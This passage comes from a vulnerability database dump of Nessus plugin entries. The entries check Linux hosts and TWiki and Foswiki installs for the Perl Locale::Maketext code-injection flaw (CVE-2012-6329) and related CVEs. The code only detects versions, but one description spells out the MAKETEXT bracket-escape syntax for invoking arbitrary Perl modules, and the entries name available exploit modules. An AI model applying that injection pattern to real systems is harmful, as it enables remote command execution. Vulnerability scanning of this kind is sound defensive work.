\"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-lang/perl\", unaffected:make_list(\"ge 5.17.7\"), vulnerable:make_list(\"lt 5.17.7\"))) flag++;\nif (qpkg_check(package:\"perl-core/Locale-Maketext\", unaffected:make_list(\"ge 1.230.0\"), vulnerable:make_list(\"lt 1.230.0\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Perl / Perl Locale-Maketext module\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:48", "description": "Fix Locale::Maketext vulnerability allowing to cross-call functions\nfrom message catalogs (CVE-2012-6329).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 19, "published": "2013-01-25T00:00:00", "title": "Fedora 16 : perl-5.14.3-205.fc16 (2013-0633)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "modified": "2013-01-25T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:perl", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2013-0633.NASL", "href": "https://www.tenable.com/plugins/nessus/64085", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0633.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64085);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56950);\n script_xref(name:\"FEDORA\", value:\"2013-0633\");\n\n script_name(english:\"Fedora 16 : perl-5.14.3-205.fc16 (2013-0633)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix Locale::Maketext vulnerability allowing to cross-call functions\nfrom message catalogs (CVE-2012-6329).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=884354\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/097440.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2de94c2c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected perl package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Foswiki 1.1.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"perl-5.14.3-205.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:48", "description": "Fix Locale::Maketext vulnerability allowing to cross-call functions\nfrom message catalogs (CVE-2012-6329). App::Cpan(3pm) manual page was\nincluded in two subpackages by mistake. This release keeps the file in\nperl-CPAN package only.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 19, "published": "2013-01-31T00:00:00", "title": "Fedora 18 : perl-5.16.2-237.fc18 (2013-0659)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "modified": "2013-01-31T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:perl"], "id": "FEDORA_2013-0659.NASL", "href": "https://www.tenable.com/plugins/nessus/64368", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0659.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64368);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56950);\n script_xref(name:\"FEDORA\", value:\"2013-0659\");\n\n script_name(english:\"Fedora 18 : perl-5.16.2-237.fc18 (2013-0659)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix Locale::Maketext vulnerability allowing to cross-call functions\nfrom message catalogs (CVE-2012-6329). App::Cpan(3pm) manual page was\nincluded in two subpackages by mistake. This release keeps the file in\nperl-CPAN package only.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=884354\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/097811.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f8c770f9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected perl package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Foswiki 1.1.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"perl-5.16.2-237.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:18:49", "description": "According to its version number, the instance of TWiki running on\nthe remote host is affected by multiple security vulnerabilities :\n\n - The '%MAKETEXT{}%' variable fails to properly sanitize\n user-supplied input. A remote attacker can exploit this\n issue to execute arbitrary shell commands on the remote\n host subject to the privileges of the web server user.\n (CVE-2012-6329)\n\n - The '%MAKETEXT{}%' variable fails to properly sanitize\n user-supplied input, which can lead to a denial of\n service) condition if an overly large value is passed to\n the variable. (CVE-2012-6330)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 27, "published": "2013-01-07T00:00:00", "title": "TWiki < 5.1.3 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6330", "CVE-2012-6329"], "modified": "2013-01-07T00:00:00", "cpe": ["cpe:/a:twiki:twiki"], "id": "TWIKI_5_1_3.NASL", "href": "https://www.tenable.com/plugins/nessus/63399", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63399);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6329\", \"CVE-2012-6330\");\n script_bugtraq_id(56950);\n\n script_name(english:\"TWiki < 5.1.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of TWiki.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a CGI application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the instance of TWiki running on\nthe remote host is affected by multiple security vulnerabilities :\n\n - The '%MAKETEXT{}%' variable fails to properly sanitize\n user-supplied input. A remote attacker can exploit this\n issue to execute arbitrary shell commands on the remote\n host subject to the privileges of the web server user.\n (CVE-2012-6329)\n\n - The '%MAKETEXT{}%' variable fails to properly sanitize\n user-supplied input, which can lead to a denial of\n service) condition if an overly large value is passed to\n the variable. (CVE-2012-6330)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to TWiki version 5.1.3 or later. Alternatively, apply the\nhotfix referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Foswiki 1.1.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/07\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:twiki:twiki\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"twiki_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/TWiki\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"TWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nversion = install['version'];\ninstall_url = build_url(port:port, qs:dir);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nver = split(version, sep:\".\", keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n# Versions 4.0.x - 5.1.2 are affected\nif (\n # 4.X\n (ver[0] == 4) ||\n # 5.x < 5.1.3\n (ver[0] == 5 && ver[1] < 1) ||\n (ver[0] == 5 && ver[1] == 1 && ver[2] < 3)\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 5.1.3' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T10:45:14", "description": "According to its version number, the instance of Foswiki installed on\nthe remote host is affected by a code injection vulnerability in the\n'%MAKETEXT{}%' macro. An incomplete fix to CVE-2012-6329 left this\nattack vector available in which an attacker can invoke arbitrary Perl\nmodules by escaping brackets within 'MAKETEXT =~~[Some::Module,~~]='. \n\nNote that Foswiki installations in which localization is not enabled or\n'Locale::Maketext' has been upgraded to version 1.23, are not affected. \n\nNote also that Nessus has not tested for this issue, but instead, has\nrelied only on the application's self-reported version number.", "edition": 23, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-03-06T00:00:00", "title": "Foswiki < 1.1.8 MAKETEXT Macro Arbitrary Code Injection", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1666", "CVE-2012-6329"], "modified": "2013-03-06T00:00:00", "cpe": ["cpe:/a:foswiki:foswiki"], "id": "FOSWIKI_1_1_8.NASL", "href": "https://www.tenable.com/plugins/nessus/65059", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65059);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-1666\");\n script_bugtraq_id(58026);\n\n script_name(english:\"Foswiki < 1.1.8 MAKETEXT Macro Arbitrary Code Injection\");\n script_summary(english:\"Checks version of Foswiki.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a CGI application that is affected by a\ncode injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the instance of Foswiki installed on\nthe remote host is affected by a code injection vulnerability in the\n'%MAKETEXT{}%' macro. An incomplete fix to CVE-2012-6329 left this\nattack vector available in which an attacker can invoke arbitrary Perl\nmodules by escaping brackets within 'MAKETEXT =~~[Some::Module,~~]='. \n\nNote that Foswiki installations in which localization is not enabled or\n'Locale::Maketext' has been upgraded to version 1.23, are not affected. \n\nNote also that Nessus has not tested for this issue, but instead, has\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://foswiki.org/Support/SecurityAlert-CVE-2013-1666\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either upgrade to version 1.1.8 or later or apply the hotfix in the\nreferenced URL. Additionally, Locale::Maketext should be upgraded to\nversion 1.23.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1666\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/06\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foswiki:foswiki\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foswiki_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"www/foswiki\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(\n appname : \"foswiki\",\n port : port,\n exit_on_fail : TRUE\n);\ndir = install[\"dir\"];\nversion = install[\"ver\"];\ninstall_url = build_url(port:port, qs:dir+\"/view\");\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, \"Foswiki\", install_url);\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nver = split(version, sep:\".\", keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n# Versions 1.0.0 - 1.1.7 are affected\nif (\n (ver[0] == 1 && ver[1] < 1) ||\n (ver[0] == 1 && ver[1] == 1 && ver[2] < 8)\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 1.1.8' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Foswiki\", install_url, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:54:07", "description": "Updated perl packages fix security vulnerability :\n\nIt was discovered that Perl's 'x' string repeat operator is vulnerable\nto a heap-based buffer overflow. An attacker could use this to execute\narbitrary code (CVE-2012-5195).\n\nThe _compile function in Maketext.pm in the Locale::Maketext\nimplementation in Perl before 5.17.7 does not properly handle\nbackslashes and fully qualified method names during compilation of\nbracket notation, which allows context-dependent attackers to execute\narbitrary commands via crafted input to an application that accepts\ntranslation strings from users (CVE-2012-6329).\n\nIn order to prevent an algorithmic complexity attack against its\nhashing mechanism, perl will sometimes recalculate keys and\nredistribute the contents of a hash. This mechanism has made perl\nrobust against attacks that have been demonstrated against other\nsystems. Research by Yves Orton has recently uncovered a flaw in the\nrehashing code which can result in pathological behavior. This flaw\ncould be exploited to carry out a denial of service attack against\ncode that uses arbitrary user input as hash keys. Because using\nuser-provided strings as hash keys is a very common operation, we urge\nusers of perl to update their perl executable as soon as possible.\nUpdates to address this issue have bene pushed to main-5.8,\nmaint-5.10, maint-5.12, maint-5.14, and maint-5.16 branches today.\nVendors* were informed of this problem two weeks ago and are expected\nto be shipping updates today (or otherwise very soon) (CVE-2013-1667).", "edition": 28, "published": "2013-04-20T00:00:00", "title": "Mandriva Linux Security Advisory : perl (MDVSA-2013:113)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-6329"], "modified": "2013-04-20T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:perl-base", "p-cpe:/a:mandriva:linux:perl-doc", "p-cpe:/a:mandriva:linux:perl-devel", "p-cpe:/a:mandriva:linux:perl", "p-cpe:/a:mandriva:linux:perl-Locale-Maketext"], "id": "MANDRIVA_MDVSA-2013-113.NASL", "href": "https://www.tenable.com/plugins/nessus/66125", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:113. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66125);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_bugtraq_id(56287, 56950, 58311);\n script_xref(name:\"MDVSA\", value:\"2013:113\");\n script_xref(name:\"MGASA\", value:\"2012-0352\");\n script_xref(name:\"MGASA\", value:\"2013-0032\");\n script_xref(name:\"MGASA\", value:\"2013-0094\");\n\n script_name(english:\"Mandriva Linux Security Advisory : perl (MDVSA-2013:113)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated perl packages fix security vulnerability :\n\nIt was discovered that Perl's 'x' string repeat operator is vulnerable\nto a heap-based buffer overflow. An attacker could use this to execute\narbitrary code (CVE-2012-5195).\n\nThe _compile function in Maketext.pm in the Locale::Maketext\nimplementation in Perl before 5.17.7 does not properly handle\nbackslashes and fully qualified method names during compilation of\nbracket notation, which allows context-dependent attackers to execute\narbitrary commands via crafted input to an application that accepts\ntranslation strings from users (CVE-2012-6329).\n\nIn order to prevent an algorithmic complexity attack against its\nhashing mechanism, perl will sometimes recalculate keys and\nredistribute the contents of a hash. This mechanism has made perl\nrobust against attacks that have been demonstrated against other\nsystems. Research by Yves Orton has recently uncovered a flaw in the\nrehashing code which can result in pathological behavior. This flaw\ncould be exploited to carry out a denial of service attack against\ncode that uses arbitrary user input as hash keys. Because using\nuser-provided strings as hash keys is a very common operation, we urge\nusers of perl to update their perl executable as soon as possible.\nUpdates to address this issue have bene pushed to main-5.8,\nmaint-5.10, maint-5.12, maint-5.14, and maint-5.16 branches today.\nVendors* were informed of this problem two weeks ago and are expected\nto be shipping updates today (or otherwise very soon) (CVE-2013-1667).\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Foswiki 1.1.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-Locale-Maketext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 